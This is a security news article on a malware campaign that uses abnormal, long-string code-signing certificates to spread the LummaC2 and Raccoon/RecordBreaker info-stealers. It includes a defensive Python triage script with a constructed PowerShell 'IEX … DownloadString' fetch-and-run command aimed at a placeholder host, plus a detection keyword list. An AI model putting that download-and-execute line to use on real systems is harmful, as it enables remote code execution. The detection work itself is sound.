October 11, 2023 at 11:41AM
Attackers are using a new method of certificate abuse to spread info-stealing malware, including malware that steals cryptocurrency from Windows systems. The campaign relies on search engine optimization poisoning to push malicious pages promoting illegal software downloads. The malware is signed with abnormal certificates whose Subject and Issuer fields hold long strings of non-English characters, special characters and punctuation, which makes them hard to inspect with standard tools. Windows users are advised to be cautious when downloading software online and to watch for the published indicators of compromise.
According to the report, attackers are employing a new type of certificate abuse to spread info-stealing malware. The goal of the campaign is to collect credentials and other sensitive data, with a particular focus on stealing cryptocurrency from Windows systems. The attackers use search engine optimization (SEO) poisoning so that search results feature malicious pages promoting illegal software cracks and downloads. In the background, these pages deliver the information stealers LummaC2 and RecordBreaker (the name under which Raccoon Stealer V2 is also tracked).
Researchers at AhnLab note that the malware used in this campaign carries abnormal certificates with very long strings in the Subject Name and Issuer Name fields. These strings mix non-English characters, special characters and punctuation marks, which makes them difficult to inspect with the standard tools and infrastructure available on Windows systems. In the sample currently in circulation, the string is a URL-encoded malicious script that downloads and executes PowerShell commands from a specific address.
According to the researchers, similar samples have been distributed consistently for more than two months, which suggests a deliberate intent behind the attackers' actions. The certificates used in this campaign are likely to fail signature verification, but they could still confuse analysts and bypass some automated defenses. This is a novel type of certificate abuse: threat actors usually disguise their binaries with normal certificates that pass verification.
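The two properties described above, an abnormally long Subject/Issuer string full of non-English characters and punctuation, and a URL-encoded PowerShell download command hidden inside it, can be triaged automatically once the signer's distinguished names have been pulled out of a PE file (for example with `Get-AuthenticodeSignature` or `signtool verify /v` on Windows). The following is an added example written for this article, not code from AhnLab or from the report it summarizes. The sample distinguished names, the embedded `powershell -ep bypass ... DownloadString(...)` command, the host `example.invalid` and the thresholds in `is_abnormal_dn` are all constructed assumptions for illustration, not values taken from the campaign.

```python
import re
import unicodedata
from urllib.parse import unquote

# Constructed for this example: a PowerShell download-and-execute one-liner of the
# kind the article describes. The host is a reserved .invalid name, not a real C2.
PAYLOAD = ("powershell -ep bypass -c IEX(New-Object Net.WebClient)"
           ".DownloadString('http://example.invalid/p.ps1')")


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte of the UTF-8 encoding (a fully URL-encoded string)."""
    return "".join("%%%02X" % b for b in s.encode("utf-8"))


# Constructed sample distinguished names, NOT certificates from the campaign.
# ABNORMAL_DN imitates the pattern AhnLab describes: long, padded with non-English
# letters and punctuation, with a URL-encoded script embedded in the middle.
ABNORMAL_DN = ("CN=" + "\u4e2d\u6587\u5b57\u7b26\u4e32!!!???;;;" * 4
               + percent_encode_all(PAYLOAD)
               + "\u0444\u044b\u0432\u0430\u043f\u0440,,,..." * 4)
BENIGN_DN = "CN=Contoso Ltd, O=Contoso Ltd, L=Redmond, S=Washington, C=US"

# Tokens that mark a decoded run as a PowerShell download/execute command.
SUSPICIOUS_TOKENS = ("powershell", "iex", "invoke-expression", "downloadstring",
                     "downloadfile", "frombase64string", "-ep bypass", "-enc")

# Runs made only of %XX escapes and URL-safe unreserved characters.
ENCODED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}|[A-Za-z0-9._~-])+")


def dn_features(dn: str) -> dict:
    """Measure the properties that distinguish abnormal signer names from normal ones."""
    total = len(dn)
    non_ascii = sum(1 for ch in dn if ord(ch) > 127)
    punct = sum(1 for ch in dn if unicodedata.category(ch).startswith("P"))
    escapes = len(re.findall(r"%[0-9A-Fa-f]{2}", dn))
    return {
        "length": total,
        "non_ascii_ratio": non_ascii / total if total else 0.0,
        "punct_ratio": punct / total if total else 0.0,
        "pct_escapes": escapes,
    }


def is_abnormal_dn(dn: str, max_len: int = 200, non_ascii_ratio: float = 0.2,
                   punct_ratio: float = 0.2, min_escapes: int = 8) -> bool:
    """Flag a Subject or Issuer string that is unusually long, unusually full of
    non-ASCII or punctuation characters, or that carries URL-encoded data.
    The thresholds are assumptions chosen for this example; tune them on your
    own population of legitimately signed binaries."""
    f = dn_features(dn)
    return (f["length"] > max_len
            or f["non_ascii_ratio"] > non_ascii_ratio
            or f["punct_ratio"] > punct_ratio
            or f["pct_escapes"] >= min_escapes)


def recover_embedded_script(dn: str) -> list:
    """URL-decode every percent-encoded run in the string and return those that
    decode to something resembling a PowerShell download-and-execute command."""
    hits = []
    for run in ENCODED_RUN.findall(dn):
        if run.count("%") < 4:        # plain words such as "CN" carry no escapes
            continue
        decoded = unquote(run)
        if any(tok in decoded.lower() for tok in SUSPICIOUS_TOKENS):
            hits.append(decoded)
    return hits


def triage_signer(subject: str, issuer: str) -> dict:
    """Combine both checks for one signer certificate."""
    return {
        "abnormal": is_abnormal_dn(subject) or is_abnormal_dn(issuer),
        "scripts": recover_embedded_script(subject) + recover_embedded_script(issuer),
    }


if __name__ == "__main__":
    for name, dn in (("abnormal", ABNORMAL_DN), ("benign", BENIGN_DN)):
        print(name, dn_features(dn), "abnormal" if is_abnormal_dn(dn) else "normal")
    print(triage_signer(ABNORMAL_DN, ABNORMAL_DN)["scripts"])
```

This is a triage layer, not a substitute for signature verification: a certificate that fails Authenticode validation should already be rejected by policy, and the point of the heuristics is to surface the abnormal-string samples that slip past tooling which cannot render or search the long Subject/Issuer fields. Feeding it the names of every signed binary dropped on a host gives a quick list of candidates whose decoded payload and download address can then be matched against the published indicators.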
LummaC2 and Raccoon Stealer, the two malware strains observed in this campaign, are well known to security researchers and offer a range of malicious functionality, but their primary purpose is stealing data from infected systems. Once installed, they can transmit sensitive user information such as account credentials, documents and cryptocurrency wallet files to the threat actor, potentially leading to severe secondary damage. In addition, a further payload of the threat actor's choosing is installed so that malicious activity can continue after the initial theft.
While the long-string certificate technique is still being refined and has had only partial success so far, Windows users are advised to exercise caution when downloading software online, especially from websites known for distributing illegal versions of popular applications. AhnLab researchers have provided indicators of compromise and a list of command-and-control domains associated with the delivery of LummaC2 and Raccoon Stealer V2 to assist users in identifying and mitigating potential threats.